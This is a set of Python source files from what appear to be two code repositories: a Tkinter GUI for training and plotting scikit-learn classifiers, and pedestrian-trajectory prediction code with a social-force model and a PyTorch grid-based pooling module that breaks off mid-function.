self.outputBtn.grid(row=9, column=4, padx=5, pady=3, sticky=W+E)
#Event Score
self.scoreVar = StringVar()
self.scoreVar.set("Score")
#Label Score
self.scoreLabel= Label(self, textvariable=self.scoreVar)
self.scoreLabel.grid(row=10, column=3, sticky=W+E)
#Event runtime
self.runtimeVar = StringVar()
self.runtimeVar.set("Runtime")
#Label Score
self.runtimeLabel= Label(self, textvariable=self.runtimeVar)
self.runtimeLabel.grid(row=10, column=4, sticky=W+E)
######### Matrix Dimensions
def dimension(self):
options_dim =[("1D",1),("2D",2),("3D",3),("All D",4)]
for txt_dim,val_dim in options_dim:
self.options_dim_radiobuttons=Radiobutton(self,
text=txt_dim,
padx=20,
variable=self.v_dim,
value=val_dim)
self.options_dim_radiobuttons.grid(row=3+val_dim, column=2, sticky=W)
########################
######### Bottom, Plot Left
def plot_data(self): #Scatter Widgets
self.HistogramBtn = Button(self, text="Histogram", width=10, command=self.HistogramClass)
self.HistogramBtn.grid(row=11, column=0, padx=5, pady=3, sticky=W+E)
self.a1dscatterBtn = Button(self, text="1DScatter", width=10, command=self.scatter1D)
self.a1dscatterBtn.grid(row=12, column=0, padx=5, pady=3, sticky=W+E)
self.a2dscatterBtn = Button(self, text="2DScatter", width=10, command=self.scatter2D)
self.a2dscatterBtn.grid(row=13, column=0, padx=5, pady=3, sticky=W+E)
self.a3dscatterBtn = Button(self, text="3DScatter", width=10, command=self.scatter3D)
self.a3dscatterBtn.grid(row=14, column=0, padx=5, pady=3, sticky=W+E)
options =[("Average Gather",1),
("Average Gather Randomized Training",2),
("Average Gather Randomized Xvalidation",3),
("Average Gather Normalized Random Training",4),
("Average Gather Normalized Random Xvalidation",5),
("Full Gather",6),
]
for txt,val in options:
self.options_radiobuttons=Radiobutton(self,
text=txt,
padx=20,
variable=self.v,
value=val)
self.options_radiobuttons.grid(row=10+val, column=1, sticky=W)
######### Bottom, Plot right
def plot_predictions(self): #Scatter Widgets
self.HistogramBtn_pred = Button(self, text="HistogramPred", width=10, command=self.HistogramClass_pred)
self.HistogramBtn_pred.grid(row=11, column=2, padx=5, pady=3, sticky=W+E)
self.a1dscatterBtn_pred = Button(self, text="1DScatterPred", width=10, command=self.scatter1D_pred)
self.a1dscatterBtn_pred.grid(row=12, column=2, padx=5, pady=3, sticky=W+E)
self.a2dscatterBtn_pred = Button(self, text="2DScatterPred", width=10, command=self.scatter2D_pred)
self.a2dscatterBtn_pred.grid(row=13, column=2, padx=5, pady=3, sticky=W+E)
self.a3dscatterBtn_pred = Button(self, text="3DScatterPred", width=10, command=self.scatter3D_pred)
self.a3dscatterBtn_pred.grid(row=14, column=2, padx=5, pady=3, sticky=W+E)
self.quickplotBtn=Button(self, text="QuickPlot_ppt", width=10, command=self.quickplotppt)
self.quickplotBtn.grid(row=15, column=2, padx=5, pady=3, sticky=W+E)
###################### Event Handlers
#Event handler: center the window and size it adequately
def centreWindow(self):
w = 1100
h = 780
sw = self.master.winfo_screenwidth()
sh = self.master.winfo_screenheight()
x = (sw - w)/2
y = (sh - h)/2
self.master.geometry('%dx%d+%d+%d' % (w, h, x, y))
#Event handler: Input training data via Menu Bar
def input_train_file(self):
global X
global header_list
from tkinter.filedialog import askopenfilename
filename=askopenfilename()
header_list=rhl.read_header_line(filename)
X=rd.read_text_file(filename)
self.TrainingNameText.delete(0, END)
self.TrainingNameText.insert(0,filename)
self.FeaturesDefList.delete(0, END)
#Event handler FeaturesDefList
counter=0
for t in header_list:
header_column=str(counter)
self.FeaturesDefList.insert(END, t + " "+ header_column)
counter=counter+1
print (X)
#Event handler: Input unlabeled application data via Menu Bar
def input_unlabeled_file(self):
global Xapp
global output_file
from tkinter.filedialog import askopenfilename
filename=askopenfilename()
Xapp=rd.read_text_file(filename)
self.ApplicationNameText.delete(0, END)
self.ApplicationNameText.insert(0,filename)
print (Xapp)
output_file=filename+"_out.txt"
#Event handler: Button Get Averages
def GatherAverage(self):
global XGather
global XappGather
# XGather=SA.XGather(X)
# print (XGather)
# XappGather=SA.XGather(Xapp)
XGather=X
XappGather=Xapp
########################################
#Event Handler, buttons to update matrix
def X1bttnAction(self):
X1feature=self.FeaturesDefList.curselection()
self.X1.insert(END,X1feature)
def X2bttnAction(self):
X2feature=self.FeaturesDefList.curselection()
self.X2.insert(END,X2feature)
def X3bttnAction(self):
X3feature=self.FeaturesDefList.curselection()
self.X3.insert(END,X3feature)
def ybttnAction(self):
yfeature=self.FeaturesDefList.curselection()
self.y.insert(END,yfeature)
############ end buttons for ease of matrix definition
#Event Handler MatrixText
def reveal_matrix(self):
import numpy as np
global Xin, u_label, Xout
global u_label
u_label=np.zeros((len(XGather[:,1]),1))
col_y = self.y.get()
if col_y == "":
message = "Always need Label"
self.y.insert(END,message)
else:
col_y=int(col_y)
u_label=XGather[:,col_y]
chosen_dim=self.v_dim.get()
if chosen_dim==1:
Xin=np.zeros((len(XGather[:,1])))[np.newaxis].T
Xout=np.zeros((len(XappGather[:,1])))[np.newaxis].T
elif chosen_dim==2:
Xin=np.zeros((len(XGather[:,1]),2))
Xout=np.zeros((len(XappGather[:,1]),2))
elif chosen_dim==3:
Xin=np.zeros((len(XGather[:,1]),3))
Xout=np.zeros((len(XappGather[:,1]),3))
elif chosen_dim==4:
Xin=np.delete(XGather,col_y,axis=1)
Xout=np.delete(XappGather,col_y,axis=1)
col_X1 = self.X1.get()
if col_X1 == "":
message = "Neeed # for 1D,2D,3D"
self.X1.insert(END,message)
else:
col_X1=int(col_X1)
Xin[:,0]=XGather[:,col_X1]
Xout[:,0]=XappGather[:,col_X1]
col_X2 = self.X2.get()
if col_X2 == "":
message = "Neeed # for 2D,3D"
self.X2.insert(END,message)
else:
col_X2=int(col_X2)
Xin[:,1]=XGather[:,col_X2]
Xout[:,1]=XappGather[:,col_X2]
col_X3 = self.X3.get()
if col_X3 == "":
message = "Neeed # for 3D"
self.X3.insert(END,message)
else:
col_X3=int(col_X3)
Xin[:,2]=XGather[:,col_X3]
Xout[:,2]=XappGather[:,col_X3]
self.MatrixText.delete(0.0,END)
self.MatrixText.insert(0.0,Xin[0:9,:])
self.labelText.delete(0.0,END)
display_label=np.array(u_label[0:9])[np.newaxis].T
print(display_label)
self.labelText.insert(0.0,display_label[0:9,:])
#Event Handler Button MatrixShape:
def RandomTrainSample(self):
global Xtrain,labeltrain,X_xval,label_xval
train_size_pct=self.sizeScale.get()
Xtrain,labeltrain,X_xval,label_xval=RTS.randomTrain(Xin,u_label,train_size_pct)
self.sizeTrainXval.set("Training Matrix: " + str(Xtrain.shape)+ " XValidation Matrix: " + str(X_xval.shape))
normalization_choice=self.NormalizeVar.get()
if normalization_choice==1:
Xtrain=NF.featureNormalize(Xtrain)
X_xval=NF.featureNormalize(X_xval)
#Event handler: Combo Box 1, algrithm
def newMethod(self, event):
print(self.methodVar.get())
algorithm=self.methodCombo.get()
if algorithm=='Support Vector Machine':
self.svm_parms()
elif algorithm=='Logistical Regression':
self.logisticReg_parms()
elif algorithm=='Neural Network SciKit':
self.NeuralNetSciKit_parms()
elif algorithm=='Neural Network':
self.NeuralNet_parms()
elif algorithm=='Naive Bayes':
self.NaiveBayes_parms()
def svm_parms(self):
self.kernel_label = Label(self, text="kernel ")
self.kernel_label.grid(row=11, column=3, sticky=W)
self.kernel_text = Entry(self)
self.kernel_text.grid(row=11, column=4, sticky=W)
self.kernel_text.delete(0,END)
self.kernel_text.insert(0,'rbf')
self.gamma_label = Label(self, text="Gamma ")
self.gamma_label.grid(row=12, column=3, sticky=W)
self.gamma_text = Entry(self)
self.gamma_text.grid(row=12, column=4, sticky=W)
self.gamma_text.delete(0,END)
self.gamma_text.insert(0,'1.0')
def logisticReg_parms(self):
self.solver_label = Label(self, text="Solver ")
self.solver_label.grid(row=11, column=3, sticky=W)
self.solver_text = Entry(self)
self.solver_text.grid(row=11, column=4, sticky=W)
self.solver_text.delete(0,END)
self.solver_text.insert(0,'liblinear')
self.gamma_label = Label(self, text="Inv. Reg Strength")
self.gamma_label.grid(row=12, column=3, sticky=W)
self.gamma_text = Entry(self)
self.gamma_text.grid(row=12, column=4, sticky=W)
self.gamma_text.delete(0,END)
self.gamma_text.insert(0,'1.0')
def NeuralNet_parms1(self):
self.numweightsinlayer1_label = Label(self, text="Hidden Layer Size")
self.numweightsinlayer1_label.grid(row=11, column=3, sticky=W)
self.numweightsinlayer1_text = Entry(self)
self.numweightsinlayer1_text.grid(row=11, column=4, sticky=W)
self.numweightsinlayer1_text.delete(0,END)
self.numweightsinlayer1_text.insert(0,'25')
self.maxiter_label = Label(self, text="Maximum Iterations ")
self.maxiter_label.grid(row=12, column=3, sticky=W)
self.maxiter_text = Entry(self)
self.maxiter_text.grid(row=12, column=4, sticky=W)
self.maxiter_text.delete(0,END)
self.maxiter_text.insert(0,'250')
def NeuralNetSciKit_parms(self):
self.hidden_layer_sizes_label = Label(self, text="Hidden Layer Sizes")
self.hidden_layer_sizes_label.grid(row=11, column=3, sticky=W)
self.hidden_layer_sizes_text = Entry(self)
self.hidden_layer_sizes_text.grid(row=11, column=4, sticky=W)
self.hidden_layer_sizes_text.delete(0,END)
self.hidden_layer_sizes_text.insert(0,'5,2')
self.solver_label = Label(self, text="Solver ")
self.solver_label.grid(row=12, column=3, sticky=W)
self.solver_text = Entry(self)
self.solver_text.grid(row=12, column=4, sticky=W)
self.solver_text.delete(0,END)
self.solver_text.insert(0,'lbfgs')
self.alpha_label = Label(self, text="Alpha ")
self.alpha_label.grid(row=13, column=3, sticky=W)
self.alpha_text = Entry(self)
self.alpha_text.grid(row=13, column=4, sticky=W)
self.alpha_text.delete(0,END)
self.alpha_text.insert(0,'1e-5')
def NaiveBayes_parms(self):
# self.priors_label = Label(self, text="Priors ")
# self.priors_label.grid(row=11, column=3, sticky=W)
# self.priors_text = Entry(self)
# self.priors_text.grid(row=11, column=4, sticky=W)
# self.priors_text.delete(0,END)
# self.priors_text.insert(0,'None')
self.priorsdesc_label = Label(self, text=" ")
self.priorsdesc_label.grid(row=11, column=3, sticky=W)
self.priorsdesc2_label = Label(self, text=" ")
self.priorsdesc2_label.grid(row=11, column=4, sticky=W)
self.priorsdesc_label = Label(self, text=" ")
self.priorsdesc_label.grid(row=12, column=3, sticky=W)
self.priorsdesc2_label = Label(self, text=" ")
self.priorsdesc2_label.grid(row=12, column=4, sticky=W)
#Event Handler:
def RunML(self):
from time import time
global Xout_pred_label,train_pred_label,xval_pred_label
print ("Xin:", Xin.shape, "Xtrain:",Xtrain.shape, "ytrain: ", labeltrain.size, "Xxval: ",X_xval.shape,"yval: ",label_xval.shape)
normalization_choice=self.NormalizeVar.get()
Xout_pred=Xout
if normalization_choice==1:
Xout_pred=NF.featureNormalize(Xout)
print("Normalization (0=False, 1=True): ",normalization_choice)
algorithm=self.methodCombo.get()
print("Machine Learning Algorithm chosen: ",algorithm)
t0 = time()
if algorithm=='Naive Bayes':
from sklearn.naive_bayes import GaussianNB
# priors_string=self.priors_text.get()
# classify=GaussianNB(priors=priors_string)
classify=GaussianNB()
classify.fit(Xtrain,labeltrain)
accuracy=classify.score(X_xval, label_xval)
self.scoreVar.set(accuracy)
train_pred_label=classify.predict(Xtrain)
xval_pred_label=classify.predict(X_xval)
Xout_pred_label=classify.predict(Xout_pred)
print("accuracy= ",accuracy)
elif algorithm=='Logistical Regression':
from sklearn import linear_model
solver = self.solver_text.get()
Cstring=self.gamma_text.get()
C=float(Cstring)
classify=linear_model.LogisticRegression(solver=solver,C=C)
classify.fit(Xtrain,labeltrain)
accuracy=classify.score(X_xval, label_xval)
self.scoreVar.set(accuracy)
print("Solver= ",solver,"C= ",C,"accuracy= ",accuracy)
train_pred_label=classify.predict(Xtrain)
xval_pred_label=classify.predict(X_xval)
Xout_pred_label=classify.predict(Xout_pred)
elif algorithm=='Support Vector Machine':
from sklearn import svm
svm_kernel = self.kernel_text.get()
Cstring=self.gamma_text.get()
C=float(Cstring)
classify=svm.SVC(kernel=svm_kernel,C=C)
classify.fit(Xtrain,labeltrain)
accuracy=classify.score(X_xval, label_xval)
self.scoreVar.set(accuracy)
print("kernel= ",svm_kernel,"C= ",C, "accuracy= ",accuracy)
train_pred_label=classify.predict(Xtrain)
xval_pred_label=classify.predict(X_xval)
Xout_pred_label=classify.predict(Xout_pred)
elif algorithm=='Neural Network SciKit':
from sklearn.neural_network import MLPClassifier
solver = self.solver_text.get()
hidden_layer_sizes=self.hidden_layer_sizes_text.get()
hidden_layer_sizes=np.fromstring(hidden_layer_sizes, dtype=int, sep=',')
alpha = self.alpha_text.get()
alpha = int(alpha)
classify = MLPClassifier(solver=solver, alpha=alpha, hidden_layer_sizes=(hidden_layer_sizes), random_state=1)
classify.fit(Xtrain,labeltrain)
accuracy=classify.score(X_xval, label_xval)
self.scoreVar.set(accuracy)
print("Size of Hidden Layers= ",hidden_layer_sizes,"Solver= ",solver,"Alpha= ",alpha,"accuracy= ",accuracy)
train_pred_label=classify.predict(Xtrain)
xval_pred_label=classify.predict(X_xval)
Xout_pred_label=classify.predict(Xout_pred)
elif algorithm=='Neural Network 2':
import NeuronalNetwork2 as nn
hidden_size_string=self.numweightsinlayer1_text.get()
hidden_size=int(hidden_size_string)
# hidden_size = 25
learning_rate = 1
max_iter_string=self.maxiter_text.get()
max_iter=int(max_iter_string)
# max_iter=250
num_labels=int(self.num_labels.get())
nntraining_weights=nn.neuronal_network(Xtrain,labeltrain,num_labels,hidden_size,learning_rate,max_iter)
xval_pred_label=nn.neuronal_network_predict(X_xval,nntraining_weights,hidden_size,num_labels)
Xout_pred_label=nn.neuronal_network_predict(Xout_pred,nntraining_weights,hidden_size,num_labels)
accuracy=nn.score(label_xval,xval_pred_label)
self.scoreVar.set(accuracy)
print("Hidden Layer SIze: ",hidden_size, " Maximum Iterations",max_iter, "accuracy= ",accuracy)
else:
print('not a valid algorithm')
tend=time()
runtime=tend-t0
runtimestring="T&P", round(runtime, 3), "s"
print (runtimestring)
self.runtimeVar.set(runtimestring)
#Event handler: Sliding Bar Label, Training and xvalidation Sample Size
def onsizeScale(self, val):
self.sizeVar.set("Training Size: " + str(val) + "%"+" Xvalidation Size: " + str(100-int(val)) + "%")
#Event handler: Normalize data
def NormChecked(self):
if self.NormalizeVar.get() == 1:
self.master.title("Features Normalized")
else:
self.master.title("Features Raw")
#Event handler: Normalize data
def newTitle(self, val):
sender = val.widget
idx = sender.curselection()
value = sender.get(idx)
self.scoreVar.set(value)
#########Plot Input
#Event Handler, option data plot
def defXfit(self):
global Xfit, fit_label
chosen=self.v.get()
if chosen==1:
Xfit=Xin
fit_label=u_label
print ("Gather avg")
elif chosen==2:
Xfit=Xtrain
fit_label=labeltrain
print ("rand train")
elif chosen==3:
Xfit=X_xval
fit_label=label_xval
print ("rand xval")
elif chosen==4:
Xfit=NF.featureNormalize(Xtrain)
fit_label=labeltrain
print ("norm rand train")
elif chosen==5:
Xfit=NF.featureNormalize(X_xval)
fit_label=label_xval
print ("norm rand xval")
else:
print ("option is not valid")
#Event Handler, 1D Scatter Button
def HistogramClass(self):
import matplotlib.pyplot as plt
self.defXfit()
number_of_labels=int(self.num_labels.get())
bins=np.arange(number_of_labels+1)-0.5
print(bins,fit_label)
plt.hist(fit_label, bins)
plt.title('Histogram Input')
plt.xlabel('Label')
plt.ylabel('Normalized Dist')
plt.show()
#Event Handler, 1D Scatter Button
def scatter1D(self):
self.defXfit()
x1=Xfit[:,0]
x2=fit_label
x1_axis=header_list[int(self.X1.get())]
number_of_labels=int(self.num_labels.get())
a2dscatter.scatterg(x1,x2,fit_label,number_of_labels,x1_axis,'LABEL','1D Input Label')
plt.show()
#Event Handler, 2D Scatter Button
def scatter2D(self):
self.defXfit()
x1=Xfit[:,0]
x2=Xfit[:,1]
x1_axis=header_list[int(self.X1.get())]
x2_axis=header_list[int(self.X2.get())]
number_of_labels=int(self.num_labels.get())
a2dscatter.scatterg(x1,x2,fit_label,number_of_labels,x1_axis,x2_axis, '2D Input Label')
plt.show()
#Event Handler, 3D Scatter Button
def scatter3D(self):
self.defXfit()
x1=Xfit[:,0]
x2=Xfit[:,1]
x3=Xfit[:,2]
x1_axis=header_list[int(self.X1.get())]
x2_axis=header_list[int(self.X2.get())]
x3_axis=header_list[int(self.X3.get())]
number_of_labels=int(self.num_labels.get())
a3dscatter.scatterg(x1,x2,x3,fit_label,number_of_labels,x1_axis,x2_axis,x3_axis, '3D Input Label')
plt.show()
#Event Handler, Output Text files with appended Label
def outputtxt(self):
import numpy as np
print("matrix shape",XappGather.shape)
dim2_Xout_pred_label=np.array(Xout_pred_label)[np.newaxis].T
print("pred label shape",dim2_Xout_pred_label.shape)
Xappend=np.append(XappGather,dim2_Xout_pred_label,axis=1)
print("Output matrix shape",Xappend.shape)
np.savetxt(output_file, Xappend)
#########Plot Output Predictions
#Event Handler, option data plot
def defXpred(self):
global Xpred_plot, pred_label_plot
chosen=self.v.get()
if chosen==1:
Xpred_plot=Xout
pred_label_plot=Xout_pred_label
print ("Gather avg")
elif chosen==2:
Xpred_plot=Xtrain
pred_label_plot=train_pred_label
print ("rand train")
elif chosen==3:
Xpred_plot=X_xval
pred_label_plot=xval_pred_label
print ("rand xval")
elif chosen==4:
Xpred_plot=NF.featureNormalize(Xtrain)
pred_label_plot=labeltrain
print ("norm rand train")
elif chosen==5:
Xpred_plot=NF.featureNormalize(X_xval)
pred_label_plot=label_xval
print ("norm rand xval")
else:
print ("option is not valid")
#Event Handler, 1D Scatter Button
def HistogramClass_pred(self):
import matplotlib.pyplot as plt
self.defXpred()
number_of_labels=int(self.num_labels.get())
bins=np.arange(number_of_labels+1)-0.5
plt.hist(pred_label_plot, bins)
plt.title('Histogram Predicted')
plt.show()
#Event Handler, 1D Scatter Button
def scatter1D_pred(self):
self.defXpred()
x1=Xpred_plot[:,0]
x2=pred_label_plot
x1_axis=header_list[int(self.X1.get())]
number_of_labels=int(self.num_labels.get())
a2dscatter.scatterg(x1,x2,pred_label_plot,number_of_labels,x1_axis,'LABEL','1D Predicted')
plt.show()
#Event Handler, 2D Scatter Button
def scatter2D_pred(self):
self.defXpred()
x1=Xpred_plot[:,0]
x2=Xpred_plot[:,1]
x1_axis=header_list[int(self.X1.get())]
x2_axis=header_list[int(self.X2.get())]
number_of_labels=int(self.num_labels.get())
a2dscatter.scatterg(x1,x2,pred_label_plot,number_of_labels,x1_axis,x2_axis,'2D Predicted')
plt.show()
#Event Handler, 3D Scatter Button
def scatter3D_pred(self):
self.defXpred()
x1=Xpred_plot[:,0]
x2=Xpred_plot[:,1]
x3=Xpred_plot[:,2]
x1_axis=header_list[int(self.X1.get())]
x2_axis=header_list[int(self.X2.get())]
x3_axis=header_list[int(self.X3.get())]
number_of_labels=int(self.num_labels.get())
a3dscatter.scatterg(x1,x2,x3,pred_label_plot,number_of_labels,x1_axis,x2_axis,x3_axis, '3D Predicted')
plt.show()
#Event Handler, Quick Plot for ppt
def quickplotppt(self):
import matplotlib.pyplot as plt
self.defXfit()
self.defXpred()
# Histograms
number_of_labels=int(self.num_labels.get())
bins=np.arange(number_of_labels+1)-0.5
plt.hist(fit_label, bins, density=True)
plt.title('Histogram Input')
plt.show()
number_of_labels=int(self.num_labels.get())
bins=np.arange(number_of_labels+1)-0.5
plt.hist(pred_label_plot, bins, density=True)
plt.title('Histogram Predicted')
plt.show()
# 1D Scatters
x1=Xfit[:,0]
x2=fit_label
x1_axis=header_list[int(self.X1.get())]
number_of_labels=int(self.num_labels.get())
a2dscatter.scatterg(x1,x2,fit_label,number_of_labels,x1_axis,'LABEL','1D Input Label')
plt.show()
x1=Xpred_plot[:,0]
x2=pred_label_plot
x1_axis=header_list[int(self.X1.get())]
number_of_labels=int(self.num_labels.get())
a2dscatter.scatterg(x1,x2,pred_label_plot,number_of_labels,x1_axis,'LABEL','1D Predicted')
plt.show()
# 2D Scatters
x1=Xfit[:,0]
x2=Xfit[:,1]
x1_axis=header_list[int(self.X1.get())]
x2_axis=header_list[int(self.X2.get())]
number_of_labels=int(self.num_labels.get())
a2dscatter.scatterg(x1,x2,fit_label,number_of_labels,x1_axis,x2_axis, '2D Input Label')
plt.show()
x1=Xpred_plot[:,0]
x2=Xpred_plot[:,1]
x1_axis=header_list[int(self.X1.get())]
x2_axis=header_list[int(self.X2.get())]
number_of_labels=int(self.num_labels.get())
a2dscatter.scatterg(x1,x2,pred_label_plot,number_of_labels,x1_axis,x2_axis, '2D Predicted')
plt.show()
# 3D Scatters
x1=Xfit[:,0]
x2=Xfit[:,1]
x3=Xfit[:,2]
x1_axis=header_list[int(self.X1.get())]
x2_axis=header_list[int(self.X2.get())]
x3_axis=header_list[int(self.X3.get())]
number_of_labels=int(self.num_labels.get())
a3dscatter.scatterg(x1,x2,x3,fit_label,number_of_labels,x1_axis,x2_axis,x3_axis,'3D Input Label')
plt.show()
x1=Xpred_plot[:,0]
x2=Xpred_plot[:,1]
x3=Xpred_plot[:,2]
x1_axis=header_list[int(self.X1.get())]
x2_axis=header_list[int(self.X2.get())]
x3_axis=header_list[int(self.X3.get())]
number_of_labels=int(self.num_labels.get())
a3dscatter.scatterg(x1,x2,x3,pred_label_plot,number_of_labels,x1_axis,x2_axis,x3_axis, '3D Predicted')
plt.show()
def main():
root = Tk()
#root.geometry("250x150+300+300") # width x height + x + y
# we will use centreWindow instead
root.resizable(width=FALSE, height=FALSE)
# .. not resizable
app = Compact_Frame(root)
root.mainloop()
if __name__ == '__main__':
main()
```
#### File: Joseph-Garzon/MachineLearningGUI/Normalize_Features.py
```python
def featureNormalize(X):
import numpy as np
np.asarray(X)
mu=np.ndarray.mean(X,axis=0)
X_norm=X-mu
sigma=np.ndarray.std(X_norm,axis=0)
X_norm=X_norm/sigma
print('the mean is',mu)
print('and sigma is',sigma)
return X_norm
``` |
{
"source": "JosephGesnouin/Asymmetrical-Bi-RNNs-to-encode-pedestrian-trajectories",
"score": 2
} |
#### File: Asymmetrical-Bi-RNNs-to-encode-pedestrian-trajectories/classical/socialforce.py
```python
import numpy as np
from scipy.interpolate import interp1d
import trajnetplusplustools
import socialforce
from socialforce.potentials import PedPedPotential
from socialforce.fieldofview import FieldOfView
def predict(input_paths, dest_dict=None, dest_type='interp', sf_params=[0.5, 2.1, 0.3],
predict_all=True, n_predict=12, obs_length=9):
pred_length = n_predict
def init_states(input_paths, start_frame, dest_dict, dest_type):
initial_state = []
for i, _ in enumerate(input_paths):
path = input_paths[i]
ped_id = path[0].pedestrian
past_path = [t for t in path if t.frame <= start_frame]
past_frames = [t.frame for t in path if t.frame <= start_frame]
future_path = [t for t in path if t.frame > start_frame]
len_path = len(past_path)
## To consider agent or not consider.
if start_frame in past_frames:
curr = past_path[-1]
## Velocity
if len_path >= 4:
stride = 3
prev = past_path[-4]
else:
stride = len_path - 1
prev = past_path[-len_path]
[v_x, v_y] = vel_state(prev, curr, stride)
## Destination
if dest_type == 'true':
if dest_dict is not None:
[d_x, d_y] = dest_dict[ped_id]
else:
raise ValueError
elif dest_type == 'interp':
[d_x, d_y] = dest_state(past_path, len_path)
elif dest_type == 'vel':
[d_x, d_y] = [pred_length*v_x, pred_length*v_y]
elif dest_type == 'pred_end':
[d_x, d_y] = [future_path[-1].x, future_path[-1].y]
else:
raise NotImplementedError
## Initialize State
initial_state.append([curr.x, curr.y, v_x, v_y, d_x, d_y])
return np.array(initial_state)
def vel_state(prev, curr, stride):
if stride == 0:
return [0, 0]
diff = np.array([curr.x - prev.x, curr.y - prev.y])
theta = np.arctan2(diff[1], diff[0])
speed = np.linalg.norm(diff) / (stride * 0.4)
return [speed*np.cos(theta), speed*np.sin(theta)]
def dest_state(path, length):
if length == 1:
return [path[-1].x, path[-1].y]
x = [t.x for t in path]
y = [t.y for t in path]
time = list(range(length))
f = interp1d(x=time, y=[x, y], fill_value='extrapolate')
return f(time[-1] + pred_length)
multimodal_outputs = {}
primary = input_paths[0]
neighbours_tracks = []
frame_diff = primary[1].frame - primary[0].frame
start_frame = primary[obs_length-1].frame
first_frame = primary[obs_length-1].frame + frame_diff
# initialize
initial_state = init_states(input_paths, start_frame, dest_dict, dest_type)
fps = 20
sampling_rate = int(fps / 2.5)
if len(initial_state) != 0:
# run
ped_ped = PedPedPotential(1./fps, v0=sf_params[1], sigma=sf_params[2])
field_of_view = FieldOfView()
s = socialforce.Simulator(initial_state, ped_ped=ped_ped, field_of_view=field_of_view,
delta_t=1./fps, tau=sf_params[0])
states = np.stack([s.step().state.copy() for _ in range(pred_length*sampling_rate)])
## states : pred_length x num_ped x 7
states = np.array([s for num, s in enumerate(states) if num % sampling_rate == 0])
else:
## Stationary
past_path = [t for t in input_paths[0] if t.frame == start_frame]
states = np.stack([[[past_path[0].x, past_path[0].y]] for _ in range(pred_length)])
# predictions
primary_track = states[:, 0, 0:2]
neighbours_tracks = states[:, 1:, 0:2]
## Primary Prediction Only
if not predict_all:
neighbours_tracks = []
# Unimodal Prediction
multimodal_outputs[0] = primary_track, neighbours_tracks
return multimodal_outputs
```
#### File: Asymmetrical-Bi-RNNs-to-encode-pedestrian-trajectories/Social-NCE_U-LSTM/gridbased_pooling.py
```python
from collections import defaultdict
import os
import numpy as np
import matplotlib.pyplot as plt
import torch
def one_cold(i, n):
"""Inverse one-hot encoding."""
x = torch.ones(n, dtype=torch.bool)
x[i] = 0
return x
class GridBasedPooling(torch.nn.Module):
def __init__(self, cell_side=2.0, n=4, hidden_dim=128, out_dim=None,
type_='occupancy', pool_size=1, blur_size=1, front=False,
embedding_arch='one_layer', pretrained_pool_encoder=None,
constant=0, norm=0, layer_dims=None, latent_dim=16):
"""
Pools in a grid of size 'n * cell_side' centred at the ped location
cell_side: Scalar
size of each cell in real world
n: Scalar
number of cells along one dimension
out_dim: Scalar
dimension of resultant interaaction vector
type_: ('occupancy', 'directional', 'social', 'dir_social')
type of grid-based pooling
front: Bool
if True, pools neighbours only in the front of pedestrian
embedding_arch: ('one_layer', 'two_layer', 'three_layer', 'lstm_layer')
architecture to encoder grid tensor
pretrained_pool_encoder: None
autoencoder to reduce dimensionality of grid
constant: int
background values of pooling grid
norm: Scalar
normalization scheme of pool grid [Default: None]
"""
super(GridBasedPooling, self).__init__()
self.cell_side = cell_side
self.n = n
self.type_ = type_
self.pool_size = pool_size
self.blur_size = blur_size
self.norm_pool = False
self.front = front
if self.front:
self.norm_pool = True
self.constant = constant
self.norm = norm
self.pool_scale = 1.0
## Type of pooling
self.pooling_dim = 1
if self.type_ == 'directional':
self.pooling_dim = 2
if self.type_ == 'social':
## Encode hidden-dim into latent-dim vector (faster computation)
self.hidden_dim_encoding = torch.nn.Linear(hidden_dim, latent_dim)
self.pooling_dim = latent_dim
if self.type_ == 'dir_social':
## Encode hidden-dim into latent-dim vector (faster computation)
self.hidden_dim_encoding = torch.nn.Linear(hidden_dim, latent_dim)
self.pooling_dim = latent_dim + 2
## Final Representation Size
if out_dim is None:
out_dim = hidden_dim
self.out_dim = out_dim
## Pretrained AE
self.pretrained_model = pretrained_pool_encoder
input_dim = None
if self.pretrained_model is not None:
input_dim = self.pretrained_model[-1].out_features
if embedding_arch == 'None':
self.out_dim = input_dim
## Embedding Grid / AE Representation
self.embedding = None
self.embedding_arch = embedding_arch
if self.embedding_arch == 'one_layer':
self.embedding = self.one_layer(input_dim)
elif self.embedding_arch == 'two_layer':
self.embedding = self.two_layer(input_dim, layer_dims)
elif self.embedding_arch == 'conv_two_layer':
self.embedding = self.conv_two_layer(input_dim, layer_dims)
elif self.embedding_arch == 'three_layer':
self.embedding = self.three_layer(input_dim, layer_dims)
elif self.embedding_arch == 'lstm_layer':
self.embedding = self.lstm_layer(hidden_dim)
def forward_grid(self, grid):
""" Encodes the generated grid tensor
Parameters
----------
grid: [num_tracks, self.pooling_dim, self.n, self.n]
Generated Grid
Returns
-------
interactor_vector: Tensor [num_tracks, self.out_dim]
"""
num_tracks = grid.size(0)
## Encode grid using pre-trained autoencoder (reduce dimensionality)
if self.pretrained_model is not None:
if not isinstance(self.pretrained_model[0], torch.nn.Conv2d):
grid = grid.reshape(num_tracks, -1)
mean, std = grid.mean(), grid.std()
if std == 0:
std = 0.03
grid = (grid - mean) / std
grid = self.pretrained_model(grid)
## Normalize Grid (if necessary)
grid = grid.reshape(num_tracks, -1)
## Normalization schemes
if self.norm == 1:
# "Global Norm"
mean, std = grid.mean(), grid.std()
std[std == 0] = 0.09
grid = (grid - mean) / std
elif self.norm == 2:
# "Feature Norm"
mean, std = grid.mean(dim=0, keepdim=True), grid.std(dim=0, keepdim=True)
std[std == 0] = 0.1
grid = (grid - mean) / std
elif self.norm == 3:
# "Sample Norm"
mean, std = grid.mean(dim=1, keepdim=True), grid.std(dim=1, keepdim=True)
std[std == 0] = 0.1
grid = (grid - mean) / std
## Embed grid
if self.embedding_arch == 'lstm_layer':
return self.lstm_forward(grid)
elif self.embedding:
return self.embedding(grid)
return grid
def forward(self, hidden_state, obs1, obs2):
## Make chosen grid
if self.type_ == 'occupancy':
grid = self.occupancies(obs1, obs2)
elif self.type_ == 'directional':
grid = self.directional(obs1, obs2)
elif self.type_ == 'social':
grid = self.social(hidden_state, obs1, obs2)
elif self.type_ == 'dir_social':
grid = self.dir_social(hidden_state, obs1, obs2)
## Forward Grid
return self.forward_grid(grid)
def occupancies(self, obs1, obs2):
## Generate the Occupancy Map
return self.occupancy(obs2, past_obs=obs1)
def directional(self, obs1, obs2):
## Makes the Directional Grid
num_tracks = obs2.size(0)
## if only primary pedestrian present
if num_tracks == 1:
return self.occupancy(obs2, None)
## Generate values to input in directional grid tensor (relative velocities in this case)
vel = obs2 - obs1
unfolded = vel.unsqueeze(0).repeat(vel.size(0), 1, 1)
## [num_tracks, 2] --> [num_tracks, num_tracks, 2]
relative = unfolded - vel.unsqueeze(1)
